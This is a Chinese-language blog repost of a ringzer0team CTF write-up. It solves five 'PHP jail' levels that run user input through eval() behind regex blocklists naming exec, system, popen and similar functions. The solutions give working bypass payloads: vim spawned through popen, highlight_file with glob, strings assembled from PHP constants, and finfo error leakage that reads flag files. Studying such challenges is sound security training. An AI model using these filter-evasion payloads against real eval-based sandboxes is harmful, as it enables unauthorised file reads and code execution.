A-A+

ringzer0team CTF – Jail Escaping PHP

2017年09月16日 11:10 汪洋大海 暂无评论 共6648字 (阅读3,192 views次)

Here are my solutions for the ringzer0 Jail Escaping PHP challenges.
https://ringzer0team.com/ 非常不错的在线CTF闯关网站(在你答完题后,会看到别人的答案,注意需要你答题完毕才可以看到别人的答案,不过这个网站的题网上基本都已经公开通关方法了。)。能学到不少技术,博主推荐,下面文章为转载。本人不想重申太多遍,本博客【汪洋大海】栏目里的所有文章均为转载,本博主会尽力标注“源地址”如果实在找不到也没办法。

Level 1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
RingZer0团队在线CTF
 
PHP Jail Level 1:
当前用户是uid = 1000(level1)gid = 1000(level1)groups = 1000(level1)
 
标志位于/home/level1/flag.txt
 
挑战PHP代码:
-----------------------------
 
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
 
if($var == null) die("PHP Jail need an argument\n");
 
function filter($var) {
        if(preg_match('/(`|open|exec|pass|system|\$|\/)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        eval($var);
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>
 
-----------------------------
Your input:

答案:

1
2
3
Your input:
echo(file_get_contents('flag.txt'));
FLAG-sW66QEY4y6724723c7w1i0oMt179E75y

Level 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
PHP Jail Level 2 
当前用户是uid = 1001(level2)gid = 1001(level2)groups = 1001(level2)
 
国旗位于/home/level2/flag.txt
 
挑战PHP代码:
-----------------------------
 
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
 
if($var == null) die("PHP Jail need an argument\n");
 
function filter($var) {
        if(preg_match('/(\/|a|c|s|require|include|flag|eval|file)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        eval($var);
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>
 
-----------------------------
Your input:

由于一些功能(如fread,file_get_contents是不允许的),我们可以使用popen,以读取flag.txt启动外部命令:

1
popen("vim", "w");

这vim是开始的,我们可以flag.txt通过将其加载到缓冲区中来读取:

1
:r flag.txt

Flag: FLAG-YlxV8cCg84zvUtt595dla5un9EW57BCL

Level 3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
RingZer0团队在线CTF
 
PHP Jail Level 3:
当前用户是uid = 1002 ( level3 ) gid = 1002 ( level3 ) groups = 1002 ( level3 )
 
标记位于/home/level3/flag.txt
 
挑战PHP代码:
-----------------------------
 
警告:PHP解释器是使用php -c php.ini jail.php启动的。
php.ini文件包含“disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,readfile,require,require_once,include,include_once,
 
-----------------------------
 
WARNING: the PHP interpreter is launched using php -c php.ini jail.php.
The php.ini file contain "disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,readfile,require,require_once,include,include_once,file"
 
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
 
if($var == null) die("PHP Jail need an argument\n");
 
function filter($var) {
        if(preg_match('/(`|\.|\$|\/|a|c|s|require|include)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        eval($var);
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>
 
-----------------------------

由于禁用了大量功能,因此必须找到允许的功能,不包含任何受限制的字符。highlight_file是这些功能之一:

1
2
3
4
5
Your input:
highlight_file(glob("fl*txt")[0]);
<code><span style="color: #000000">
FLAG-D6jg9230H05II3ri5QB7L9166gG73l8H<br /></span>
</code>Command executed

Level 4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
RingZer0团队在线CTF
 
PHP Jail Level 4:
当前用户是uid = 1003 ( level4 ) gid = 1003 ( level4 ) groups = 1003 ( level4 )
 
国旗位于/home/level4/flag.txt
 
挑战PHP代码:
-----------------------------
 
警告:PHP解释器是使用php -c php.ini jail.php启动的。
php.ini文件包含“disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,readfile,require,require_once,include,include_once,
 
 
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
 
if($var == null) die("PHP Jail need an argument\n");
 
function filter($var) {
        if(preg_match('/(\'|\"|`|\.|\$|\/|a|c|s|require|include)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        eval($var);
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>
 
-----------------------------
Your input:

正如你可以看到highlight_source是没有禁用,所以你可以使用某物像:

1
highlight_source("flag.txt");

然而,双引号和字符“a”和“。” 不允许。下一个想法是使用glob:

1
highlight_source(glob("*")[4]);

但再次:双引号和“*”字符是不允许的。由于我的解决方案很复杂,我会尝试解释一下我的想法:

a)我需要“/”字符(也不允许)b)我需要“a”字符c)我需要一种方式来定义一个字符串而不使用双引号d)我想以某种方式构建字符串“/ home /level4/flag.txt“与允许的字符并使用它 glob

现在解决每一个特定问题:

a)使用phpinfo();我发现有一些环境变量可以用来提取“/”。然后我跑了

1
2
3
print_r(getenv(HOME));
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
/home/level4Command executed

然后我可以通过使用来提取“/”

1
getenv(HOME)[0];

B)PHP有一些预定义的常量一样__FILE__,__DIR__等等:

1
2
print_r(__FILE__);
/home/level4/jail.php(14) : eval()'d codeCommand executed

使用__FILE__我可以提取“a”和“。”。
c)利用define(),implode()/ explode()一个可以定义contants字符串和应用阵列操作,以提取/ CONCAT字符:

1
2
3
4
5
6
7
8
9
10
define(HEY,__FILE__);print_r(explode(getenv(HOME)[0],HEY));
PHP Notice:  Use of undefined constant HEY - assumed 'HEY' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
Array
(
    [0] => 
    [1] => home
    [2] => level4
    [3] => jail.php(14) : eval()'d code
)

通过使用,implode()您可以连接几个字符:

1
2
3
4
5
6
7
print_r(implode(getenv(HOME)[0],[getenv(HOME)[0],home,level4,file]));
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant home - assumed 'home' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant level4 - assumed 'level4' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant file - assumed 'file' in /home/level4/jail.php(14) : eval()'d code on line 1
//home/level4/fileCommand executed

d)现在如果你把a),b)和c)放在一起,你应该可以建立你的有效载荷:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
define(HEY, __FILE__); highlight_file(implode(getenv(HOME)[0],[getenv(HOME)[0],home,level4,getenv(HOME)[0],implode(explode(getenv(HOME)[0],HEY)[0], [fl,explode(getenv(HOME)[0],HEY)[3][1],g,explode(getenv(HOME)[0],HEY)[3][4],t,x,t])])); 
PHP Notice:  Use of undefined constant HEY - assumed 'HEY' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant home - assumed 'home' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant level4 - assumed 'level4' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant fl - assumed 'fl' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant g - assumed 'g' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant t - assumed 't' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant x - assumed 'x' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant t - assumed 't' in /home/level4/jail.php(14) : eval()'d code on line 1
<code><span style="color: #000000">
FLAG-X9uF51b0X570f616897kLN3It3K6m63c<br /></span>
</code>Command executed

我知道...非常复杂(我已经看到解决方案使用hex2bin()),但它的工作:)

Level 5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
RingZer0团队在线CTF
 
PHP Jail Level 5:
当前用户是uid = 1004(level5)gid = 1004(level5)groups = 1004(level5)
 
国旗位于/home/level5/flag.txt
 
挑战PHP代码:
-----------------------------
 
警告:PHP解释器是使用php -c php.ini jail.php启动的。php.ini文件包含“disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,readfile,require,require_once,include,include_once,
 
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
 
if($var == null) die("PHP Jail need an argument\n");
 
function filter($var) {
        if(preg_match('/(\_|\'|\"|`|\.|\$|\/|a|c|s|z|require|include)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        eval($var);
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>
 
-----------------------------
Your input:

我做的第一件事是生成filename(flag.txt):

1
2
3
4
Your input:
print(glob(hex2bin(hex2bin(3261)))[0]);
flag.txtCommand executed
Your input:

然后我需要一些功能来读取内容flag.txt。然而,由于额外的字符限制,我无法找到任何绕过限制的人。然后我买了提示:

1
md5 can return raw characters such as *, Some classes can help you error messages too

所以我需要一些类与一些构造函数,它以文件名作为参数。一如既往:Google是您的朋友 - > inurl:php.net/manual/en/class。然后我找到了Finfo:

1
2
3
4
5
6
Your input:
new Finfo(0,glob(hex2bin(hex2bin(3261)))[0]);
PHP Notice:  finfo::finfo(): Warning: offset `FLAG-81M2544kLM9nxBJCfMG2ET8329Lo1qqZ' invalid in /home/level5/jail.php(14) : eval()'d code on line 1
PHP Notice:  finfo::finfo(): Warning: type `FLAG-81M2544kLM9nxBJCfMG2ET8329Lo1qqZ' invalid in /home/level5/jail.php(14) : eval()'d code on line 1
PHP Warning:  finfo::finfo(): Failed to load magic database at '/home/level5/flag.txt'. in /home/level5/jail.php(14) : eval()'d code on line 1
Command executed

文章来源:http://blog.dornea.nu/2016/06/20/ringzer0-ctf-jail-escaping-php/

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×

给我留言